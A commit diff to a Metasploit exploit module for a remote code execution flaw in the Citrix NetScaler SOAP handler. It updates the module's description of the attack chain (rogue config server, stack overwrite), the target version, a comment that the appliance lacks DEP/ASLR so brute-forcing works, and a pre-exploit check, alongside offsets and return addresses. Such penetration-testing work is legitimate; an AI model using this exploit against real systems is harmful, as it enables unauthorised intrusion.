Update module information

jvazquez-r7 · jvazquez-r7 · commit 9404e24b24ff · 2014-10-30T20:33:38.000-05:00
diff --git a/modules/exploits/freebsd/misc/citrix_netscaler_bof.rb b/modules/exploits/freebsd/misc/citrix_netscaler_bof.rb
@@ -14,10 +14,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Citrix NetScaler Buffer Overflow",
+      'Name'           => "Citrix NetScaler SOAP Handler Remote Code Execution",
       'Description'    => %q{
-        This module exploits a buffer overflow vulnerability found in Citrix NetScaler...
-        The vulnerability exists.... This module has been tested successfully on....
+        This module exploits a memory corruption vulnerability on the Citrix NetScaler Appliance.
+        The vulnerability exists in the SOAP handler, accessible through the web interface. A
+        malicious SOAP requests can force the handler to connect to a malicious NetScaler config
+        server. This malicious config server can send a specially crafted response in order to
+        trigger a memory corruption and overwrite data in the stack, to finally execute arbitrary
+        code with the privileges of the web server running the SOAP handler. This module has been
+        tested successfully on the NetScaler Virtual Appliance 450010.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -27,7 +32,7 @@ def initialize(info={})
         ],
       'References'     =>
         [
-          ['URL', 'http://http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
+          ['URL', 'http://console-cowboys.blogspot.com/2014/09/scaling-netscaler.html']
         ],
       'Payload'        =>
         {
@@ -40,11 +45,14 @@ def initialize(info={})
       'Stance'         => Msf::Exploit::Stance::Aggressive,
       'Targets'        =>
         [
-          [ 'NetScaler Virtual Appliance',
+          [ 'NetScaler Virtual Appliance 450010',
             {
               'RwPtr'        => 0x80b9000, # apache2 rw address / Since this target is a virtual appliance, has sense.
               'Offset'       => 606,
               'Ret'          => 0xffffda94, # Try before bruteforce...
+              # The virtual appliance lacks of security mitigations like DEP/ASLR, since the
+              # process being exploited is an apache child, the bruteforce attack works fine
+              # here.
               'Bruteforce'   =>
                 {
                   'Start' => { 'Ret' => 0xffffec00 }, # bottom of the stack
@@ -84,6 +92,10 @@ def exploit
       fail_with(Failure::BadConfig, 'Don\'t use 0.0.0.0 as SRVHOST, use an address on the local machine reachable by the target')
     end
 
+    if check != Exploit::CheckCode::Detected
+      fail_with(Failure::NoTarget, "#{peer} - SOAP endpoint not found")
+    end
+
     start_service
 
     if target.ret
